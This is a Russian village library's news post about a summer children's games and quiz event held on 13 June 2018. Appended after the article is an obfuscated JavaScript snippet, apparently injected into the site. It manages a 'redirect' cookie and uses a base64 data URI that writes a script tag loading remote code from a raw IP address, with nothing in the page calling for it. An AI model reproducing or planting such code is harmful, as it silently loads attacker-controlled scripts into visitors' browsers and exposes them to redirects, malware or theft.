Вот оно какое, наше лето!

Каждый день, каждый час летних каникул удивителен и неповторим. Организовывая свою жизнь, свою деятельность, дети умнеют, духовно богатеют, становятся лучше. В дни летних каникул двери Верхне-Есауловской сельской библиотеки всегда открыты для увлекательных путешествий в чудесный мир книг с любимыми литературными героями, конкурсами и играми. Вот и 13 июня 2018 года на полянке около библиотеки прошла конкурсно — игровая программа «Вот оно какое, наше лето!». Главными участниками мероприятия стали активные читатели библиотеки и все желающие. Ребят ждали непростые испытания на ловкость, смелость и сообразительность в играх: «Солнышко и дождик», «Рыбы, звери, птицы». Познавательно и весело провели своё свободное время дети, принимая участие в играх и конкурсах, отвечая на вопросы викторины «Летние деньки, «Герои сказок», «Доскажи словечко». Самые любознательные и находчивые получили призы.

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}